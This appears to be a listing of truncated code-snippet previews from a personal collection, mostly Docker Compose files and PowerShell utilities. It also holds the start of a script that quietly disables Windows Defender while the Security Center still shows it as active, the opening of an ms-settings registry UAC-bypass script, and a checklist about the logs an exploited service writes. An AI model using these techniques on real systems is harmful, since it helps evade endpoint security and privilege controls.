| #include <windows.h> | |
| #include <TlHelp32.h> | |
| #include <iostream> | |
| #include <string> | |
| #include <sstream> | |
| using namespace std; | |
| int main(int argc, char* argv[]) | |
| { |
Whenever you research a certain vulnerability ask yourself these questions and please answer them for us
Does the exploited service write a log?
(check ls -lrt /var/log or lsof +D /var/log/ or lsof | grep servicename)
Does a system service write a log?
(e.g. check with tail -f /var/log/messages)
| # https://github.com/jacobalberty/unifi-docker | |
| # I use volumes because I don't care about this data 😝 | |
| volumes: | |
| init: | |
| log: | |
| services: | |
| mongo: | |
| image: mongo:4 |
| #Requires -RunAsAdministrator | |
| # "Disables" Defender by adding exclusions and turning off advanced bits. Run this under an elevated powershell prompt | |
| # Defender will be essentially gutted/disabled without messing with any files/underlying services. Windows Security center will still display that AV is working etc. | |
| $driveletters = [char]'a'..[char]'z' | |
| # Ref https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference | |
| # Useful: https://github.com/dgoldman-msft/Get-MpPreferences/blob/main/Get-MpPreferences.ps1 | |
| $paramHash = @{ |
| try { | |
| Import-Module PSWriteHTML -ErrorAction Break | |
| } | |
| catch { | |
| Install-Module -Name PSWriteHTML -Scope CurrentUser | |
| } | |
| $SCOOP_BUCKETS_DIR = (Get-ChildItem $ENV:SCOOP\Buckets) | |
| $SCOOP_MANIFESTS = [System.Collections.Generic.List[object]]::new() |
| PS> time { ping -n 1 google.com } -Samples 10 -Silent | |
| .......... | |
| Avg: 62.1674ms | |
| Min: 56.9945ms | |
| Max: 87.9602ms | |
| PS> time { ping -n 1 google.com } -Samples 10 -Silent -Long | |
| .......... | |
| Avg: 00:00:00.0612480 | |
| Min: 00:00:00.0572167 |
| $tableLayout = ( | |
| @{Expression = { ((New-Object System.Security.Principal.SecurityIdentifier($_.Value)).Translate([System.Security.Principal.NTAccount])).Value }; Label = "Name"; Width = 40 }, | |
| @{Expression = { $_.Value }; Label = "SID"; Width = 40 }, | |
| @{Expression = { $_.Type }; Label = "Type" } | |
| ) | |
| $Claims = ([Security.Principal.WindowsIdentity]::GetCurrent()).Claims | |
| $Claims | Format-Table $tableLayout |
| param ( | |
| [Parameter(Mandatory = $True)] | |
| [ScriptBlock]$ScriptBlock | |
| ) | |
| if ([System.Security.Principal.WindowsIdentity]::GetCurrent().Groups.Value -match 'S-1-5-32-544') { | |
| Write-Host 'Already Elevated' | |
| } else { | |
| $RegPath = 'HKCU:\software\classes\ms-settings\shell\open\command' | |
| New-Item $RegPath -Force | |
| New-ItemProperty $RegPath -Name 'DelegateExecute' -Value $null -Force |
I recommend this only be done on homelab/segmented hardware. This will make your host vulnerable to these exploits.
Depending on your CPU generation, you can regain 20-30% performance.
| # First run: | |
| # mkdir -p ./data/elasticsearch_data ./data/logstash_config && sudo chown -R 1000:1000 ./data | |
| services: | |
| # https://www.elastic.co/guide/en/elasticsearch/reference/current/docker.html | |
| elasticsearch: | |
| image: docker.elastic.co/elasticsearch/elasticsearch:7.14.0 | |
| container_name: elasticsearch | |
| environment: |